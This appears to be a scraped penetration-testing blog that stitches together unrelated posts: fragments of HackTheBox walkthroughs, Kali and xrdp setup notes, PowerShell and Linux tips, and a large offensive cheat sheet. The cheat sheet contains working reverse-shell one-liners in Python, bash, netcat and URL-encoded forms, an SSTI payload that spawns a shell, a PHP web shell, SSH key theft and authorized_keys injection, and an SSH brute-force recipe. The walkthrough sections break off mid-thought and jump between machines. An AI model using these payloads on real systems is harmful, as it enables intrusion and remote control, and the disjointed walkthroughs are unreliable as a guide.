Twice now, I have loaded my VM for a day of digging around HTB and found that none of my arrow keys work in my terminal. The enter key sometimes works, the number keypad is dead, generally its a mess.

After a good amount of digging, this seems to fix it, once you run the command, kill the session, and start a new one.

sudo chsh -s /bin/bash

I picked this up from askubuntu:

https://askubuntu.com/questions/325807/arrow-keys-home-end-tab-complete-keys-not-working-in-shell

Well that probably explains it, I had been playing around far too much with /bin/sh.

This is one of the retired boxes on HTB, lets spawn an instance and dive in.

First add the IP to the host file.

nano /etc/hosts

So I started with a basic nmap scan, but pinging the machine appears to be blocked.

Lets add the -Pn and force it to go again.

nmap -sC -sV -v -Pn nodeblog.htb

So this is one of the easy rated boxes from HTB, lets dive in and add the IP to the /etc/hosts file:

sudo nano /etc/hosts

Now a good nmap scan for a start:

nmap -sC -sV -sT -p- -v antiquehtb

sudo nmap -sC -sV -sT -sU -v antique.htb

This will take a looooooong time, so we’ll come back to it later.

The nmap shows us some interesting things, the name “HP Jetdirect” comes up alot, the telnet port is also pretty interesting.

That would mean we have a printer, but theres no IPP port open.

Lets check searchsploit for JetDirect:

A few good finds, but I like the look of SNMP password disclosure, SNMP is usually pretty open. Lets search on exploit-db.

Okay lets have a play.

First lets do a walk while nmap is still being slow.

snmpwalk -v 2c -c public antique.htb

Well that was disappointing, but it is listening

Can we run the exploit?

Ergh that would be a no.

I did try and find out how to install snmputil, but it didn’t show on apt, and nor did net-snmp or net-snmp-util.

Maybe we can help along the snmpwalk command..

Okay that’s better.

I think that’s Hex coded, lets take a look:

Although this is not the nicest of shells..

Actually hang on lets read that again, we can use the “exec command” to send system commands.

So what does id give us?

exec id

Okay that’s better, any cheeky flag for us?

Yes that is a cheeky flag!

so we can use the cat command and id, can we use python?

I think that is a kind of?

python3?

So this hung on me, but we must have it something.

Lets try some more examples.

This page contains a script to fix a number of issues in the current version, and also to deploy some additional tools into a new instance in an automated fashion.

apt-get update
apt-get upgrade -y

#Fix issue in the the Harveter
pip3 install aiohttp --upgrade

#getpspy scripts
mkdir ~/pspy
cd ~/pspy
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

I am a big fan of VM’s, but not such a fan of the tools used to connect to them in most instances.

Hyper-V, vSphere remote console, VMWare player, they all feel clunky, have inconsistent features and lack some of the basics I really enjoy from modern RDP.

Kali does not have this out of the box, so lets see if we can enable it.

Take a fresh kali install, and lets open a terminal:

apt-get update 
apt-get install xrdp 
systemctl start xrdp
systemctl start xrdp-sesman


systemctl enable xrdp
systemctl enable xrdp-sesman

Now there are a few configuration items we need to make.

Only one “X” session is allowed by default, which means if you will get a black screen after trying to connect if you are also on the machine locally.

It can also be a problem if your session gets disconnected, as there are times when re-connecting to the existing session will fail.

Lets make an edit to the /etc/xrdp/startwm.sh file.

Add these lines before the “test -x /etc/x11/xession && exec ” line:

unset DBUS_SESSION_BUS_ADDRESS
unset XDG_RUNTIME_DIR
. $HOME/.profile

at this point, I like to reboot the machine to emulate a fresh session and see what we get:

Beautiful!

Now we have a full RDP session, with copy and paste and a 4k resolution!

updated 22/01/2022

Scanning Tools:

Rustscan

Find open ports – similar to nmap but quicker.

Requires docker for install

rustscan -a **Hostname** -u 2500

Nmap

Find open ports and services

Scan for Services:

nmap **hostname** -v -sV

Run default scripts on found services:

nmap **hostname** -v -sV -Sc

Strings

Find all strings in a file

strings **filename**

Binwalk

Find all files embedded in a file

binwalk -e **filename**

---

Enumeration Tools:

Amass subdomain scanner

amass -d **domain** **anotherdomain**

lse.sh

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Enum4Linux

Enumerates Linux hosts

enum4linux -a 10.10.11.108

FFUF

#subdomain
ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200


#files
ffuf -u http://pets.devzat.htb/FUZZ -w ~/tools/SecLists/Discovery/Web-Content/raft-small-words.txt -fs 510

PSPY

Resource monitoring without root

https://github.com/DominicBreuker/pspy

GoBuster

Enumerates websites based on a worldlist.

Directories:
gobuster dir -u **hostname** -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard

Subdomains:
gobuster vhost -u **hostname**  -w /home/dev/subdomains-top1million-110000.txt -r 

PHP Files:

gobuster dir-u **hostname**  -w /home/dev/subdomains-top1million-110000.txt -xphp

DirSearch

Web enumeration

python3 dirsearch.py -u 10.10.11.104  

WFuzz

Subdomain:
wfuzz -w **wordlist** -u http://**HOST**/ --hc 301 -v -c -H "Host:FUZZ.**hostname**"


Pages:
wfuzz -w **wordlist** -u http://**SUBDOMAIN.HOST**/FUZZ -v -c --hc 404,403 -hw 33  

Parameters:
wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0

Whatweb

Determines the type of a website, such as “WordPress”

whatweb **hostname**

Searchsploit

Searches for exploits in a given platform

searchsploit **platform** **version**

e.g:

searchsploit wordpress 5.8.2

Find files with read/write access

find / -type f -user **user** -perm 600 2>/dev/null

WordPress Scan

Scans wordpress sites

wpscan --url http://**HOSTNAME**/ --api-token **TOKEN** --enumerate p,u --plugins-detection aggressive

Find SETUID files

find / -perm -u=s -type f 2>/dev/null

---

Command Injection Examples

PHP

<?php system($_GET[cmd]);?>

Reconnaissance tools:

Chisel

Allows you to redirect traffic from a running port or service by using a client and server on each target.

Server:

git clone https://github.com/jpillora/chisel
cd chisel && CGO_ENABLED=0 go build -ldflags="-s -w"
sudo ./chisel server -p 8000 --reverse

Client:

./chisel client **SERVERIP**:8000 R:**porttoforward**:127.0.0.1:**porttoforward**

Port Forward traffic using SSH

ssh -i **privateKey** -L **portToForward**:127.0.0.1:**portToForward** **user@host**

Netcat

open a specified port and listen:

sudo nc -lvnp **port**

make a connection

nc **host**

Git Extractor

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh

Git Dumper

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh

/gitdumper.sh http://pets.devzat.htb/.git/ HTBdevzat

Identify Hashed strings

https://hashes.com/en/tools/hash_identifier

---

Privilege Escalation

Extract user ssh key

#extract the key
echo $(cat /home/**user**/.ssh/id_rsa) > /dev/tmp/key`;

#place it in the client system, use it to make a ssh connection
ssh -i *keyfile* user@hostname.fqdn

Useful File Locations:

Linux

/etc/passwd
/etc/shadow
/var/log/mysql/error.log

Resources:

Exploit DB

https://www.exploit-db.com/

Reverse Shell Guide

https://sentrywhale.com/documentation/reverse-shell

Sub Domain List

https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt

Vulners

http://vulners.com

---

Exploit Tools

Evil-WinRM

Access Win-rm using linux

evil-winrm -i **hostname** -u **user** -p **password**

crackmap

Exploitation tool for linux which targets a number of protocols.

SMB – check credentials:

crackmapexec smb **hostname** -u **user** -p **password**

winrm – check credentials:

crackmapexec winrm **hostname** -u **user** -p **password**

MetaSploit

init the framework:

 sudo msfdb init

start DB:

sudo msfdb start

connect to console:

msfconsole -q

search for exploit:

search **platformname**

get current user:

getuid

execute a remote command:

execute -f cmd.exe -c -i

spawn a listener:

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost <mymachine>
set lport <myport>
run

Shell one Liners:

Serverside Template Injection

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *IP* *PORT* >/tmp/f')|attr('read')()}}

Python3

exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",12234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Bash

bash -c 'bash -i >& /dev/tcp/**ip**/**port** 2>&1

bash -c 'bash -i >& /dev/tcp/**IP**/**port** 0>&1'

mkfifo /tmp/lol;nc **IP** **PORT** 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

Encode to base 64

#encode
 echo -n 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1' | base64

#server (inject into web parameter)
echo -n ***encodedstring*** | base64 -d | bash

URL encoded Bash

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.8/9001+0>%261'

NC

nc **clientip** -e /bin/bash

Web

%26/bin/bash+-c+'bash+-i+>+/dev/tcp/**IP**/**Port**+0>%261'

---

Stabilizing a shell

Python

python -c 'import pty;pty.spawn("/bin/bash")'

---

Inject SSH-key to target machine:

On Client:
ssh-keygen -t rsa -b 4096 -C '**user@domain**' -f **outputfile** -P ''
export PUBLIC_KEY=$(cat **outputfile**.pub)

Code Injection:
mkdir -p /home/**targetuser**/.ssh; echo $PUBLIC_KEY >> /home/**targetuser**/.ssh/authorized_keys"

---

CURL encode payload data

curl -i -H "**headers**" '**url**' -G --data-urlencode "**injectionPoint**;**injected commands**"

---

Privilege Escalation

Install ssh key via symlink

#*fileToWrite* must be named id_rsa.pub or keys
ln -s /root/.ssh/authorized_keys *fileToWriteTo*

Spawn a python webserver in current folder

python3 -m http.server 80

---

SSH Brute Force

msfconsole
use auxilary/scanner/ssh/ssh_login
set rhosts *target*
set username root
set pass_file *wordlist*
set verbose true
set stop_on_success
run

This PowerShell cheat sheet will list for you a number of commands that I often find useful.

Lets get started with some that are more simple:

Class Definition in PowerShell:

Class MyClass(){
MyClass(){
}


}

Return from a function PowerShell:

Class MyClass(){
#function returns a string variable type
[string]exampleFunction(){
$string = example
return $string
}

}

Get All Files in a Directory:

Get-childitem -path $path

This will return all files in the current directory.

Loop over files in a directory:

Get-Childitem -path $path | foreach{ ** do something ** }

This will ** do something ** to all the files in the directory

Linux Command Cheat Sheet.

System Information:

uname -a

This will return some useful information about the specific flavour of the OS and its kernel.

Shutdown / Restart

shutdown -r now

or:

init 6

This will restart the current system

Dump a SQLite database

sqlite3 /path/to/file

.output /path/to/save/output

.dump

.exit